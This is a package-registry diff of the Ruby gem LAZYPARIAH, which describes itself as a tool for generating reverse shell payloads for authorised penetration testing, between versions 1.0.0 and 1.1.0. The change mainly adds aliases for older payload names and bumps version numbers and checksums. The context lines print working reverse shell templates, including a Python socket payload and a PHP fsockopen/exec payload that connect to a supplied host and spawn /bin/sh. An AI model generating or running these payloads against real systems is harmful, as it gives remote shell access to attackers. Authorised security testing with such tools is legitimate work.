lazypariah 1.0.0 → 1.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +39 -7
  3. metadata +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 39fa66ebf06f26ea52ea9033989efa12ac2a517eaaecc9403c71f5cc6e2e0203
4
- data.tar.gz: f8de654a384319b9b3f11cb8dd5d0c0618ed17086115144c92fee6b5e20a29c5
3
+ metadata.gz: 1288e500075f52658c2f940333c165b9193428741782923954475ae633aaa649
4
+ data.tar.gz: 98f23bade85e537388413124dbccd9342df216b062b739cd883303a8ce57fcc2
5
5
  SHA512:
6
- metadata.gz: c8ec9e1b3e0301e242ebe549db465103c72bd47b5b8799df416846143d6d61352f427e8dcb2b030dd03c4988558275bc2127b06df501f771ff989e20909be014
7
- data.tar.gz: 82cd305608c676d0254d7bd9177cc2e227363fbfdbb5878628d82cc3adccef4719ad78eb06a4d6dbe5a06009fbe1431e591b57e09937d3fd9419922e90e8b5e2
6
+ metadata.gz: 6615b3769dff4d020ab040d0cf954b73e5c36a458777c69f8a17f6b4b726d3885b45f27a2cda8eba440afe6de2566591f69837607b3a61835676af6b54581dad
7
+ data.tar.gz: ea35b055a2a0e588d6d90831fca667ba82fd7abdf2c635e4027b5761e33338336f34b17ace98fc3a33b1de5c5cd14d038b66a77f12870fe21ddd5ce26ca04571
data/bin/lazypariah CHANGED
@@ -1,7 +1,7 @@
1
1
  #!/usr/bin/env ruby
2
2
  #
3
3
  # Title: LAZYPARIAH
4
- # Version: 1.0.0
4
+ # Version: 1.1.0
5
5
  # Description:
6
6
  # LAZYPARIAH is a simple tool for generating various reverse shell payloads
7
7
  # on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
29
29
 
30
30
  # Define constants.
31
31
  PROGRAM_NAME = "LAZYPARIAH".freeze()
32
- PROGRAM_VERSION = "1.0.0".freeze()
32
+ PROGRAM_VERSION = "1.1.0".freeze()
33
33
  EXECUTABLE_NAME = "lazypariah".freeze()
34
34
 
35
35
  # Define payload list.
@@ -67,6 +67,28 @@ PAYLOAD_LIST = [
67
67
  "c_binary_gzip_hex"
68
68
  ].sort()
69
69
 
70
+ # Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
71
+ PAYLOAD_BC_DICT = {
72
+ "php_fd_3"=>{"payload"=>"php_fd", "fd"=>"3"},
73
+ "php_fd_4"=>{"payload"=>"php_fd", "fd"=>"4"},
74
+ "php_fd_5"=>{"payload"=>"php_fd", "fd"=>"5"},
75
+ "php_fd_6"=>{"payload"=>"php_fd", "fd"=>"6"},
76
+ "php_fd_3_c"=>{"payload"=>"php_fd_c", "fd"=>"3"},
77
+ "php_fd_4_c"=>{"payload"=>"php_fd_c", "fd"=>"4"},
78
+ "php_fd_5_c"=>{"payload"=>"php_fd_c", "fd"=>"5"},
79
+ "php_fd_6_c"=>{"payload"=>"php_fd_c", "fd"=>"6"},
80
+ "php_fd_3_tags"=>{"payload"=>"php_fd_tags", "fd"=>"3"},
81
+ "php_fd_4_tags"=>{"payload"=>"php_fd_tags", "fd"=>"4"},
82
+ "php_fd_5_tags"=>{"payload"=>"php_fd_tags", "fd"=>"5"},
83
+ "php_fd_6_tags"=>{"payload"=>"php_fd_tags", "fd"=>"6"},
84
+ "python3_c"=>{"payload"=>"python_c", "pv"=>"3"},
85
+ "python2_c"=>{"payload"=>"python_c", "pv"=>"2"},
86
+ "python3_b64"=>{"payload"=>"python_b64", "pv"=>"3"},
87
+ "python2_b64"=>{"payload"=>"python_b64", "pv"=>"2"},
88
+ "python3_hex"=>{"payload"=>"python_hex", "pv"=>"3"},
89
+ "python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"}
90
+ }
91
+
70
92
  # Define function for displaying program information.
71
93
  def prog_info(donation_info=true)
72
94
  puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
@@ -146,7 +168,7 @@ begin
146
168
  puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
147
169
  puts(option_parser)
148
170
  exit()
149
- elsif not PAYLOAD_LIST.include?(ARGV[0])
171
+ elsif not PAYLOAD_LIST.include?(ARGV[0]) and not PAYLOAD_BC_DICT.include?(ARGV[0])
150
172
  prog_info()
151
173
  puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
152
174
  puts(option_parser)
@@ -171,7 +193,17 @@ begin
171
193
  exit()
172
194
  end
173
195
 
174
- case ARGV[0]
196
+ # Parse payload, applying aliases for backwards compatibility with versions < 1.0.0.
197
+ if PAYLOAD_BC_DICT.include?(ARGV[0])
198
+ bc_dict = PAYLOAD_BC_DICT[ARGV[0]]
199
+ selected_payload = bc_dict["payload"]
200
+ tcp_fd = bc_dict["fd"]
201
+ python_version = bc_dict["pv"]
202
+ else
203
+ selected_payload = ARGV[0]
204
+ end
205
+
206
+ case selected_payload
175
207
  when "python"
176
208
  print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
177
209
  when "python_c"
@@ -196,7 +228,7 @@ begin
196
228
  if not tcp_fd
197
229
  puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
198
230
  else
199
- case ARGV[0]
231
+ case selected_payload
200
232
  when "php_fd"
201
233
  print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
202
234
  when "php_fd_c"
@@ -241,7 +273,7 @@ begin
241
273
 
242
274
  File.open(temp_dir+"/rs.class", "r") do |f|
243
275
  java_payload = f.read()
244
- case ARGV[0]
276
+ case selected_payload
245
277
  when "java_class_binary"
246
278
  print_output(java_payload, new_line=false)
247
279
  when "java_class_b64"
@@ -270,7 +302,7 @@ begin
270
302
 
271
303
  File.open(temp_dir+"/rs", "r") do |f|
272
304
  binary_payload = f.read()
273
- case ARGV[0]
305
+ case selected_payload
274
306
  when "c_binary"
275
307
  print_output(binary_payload, new_line=false)
276
308
  when "c_binary_b64"
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: lazypariah
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.0
4
+ version: 1.1.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Peter Funnell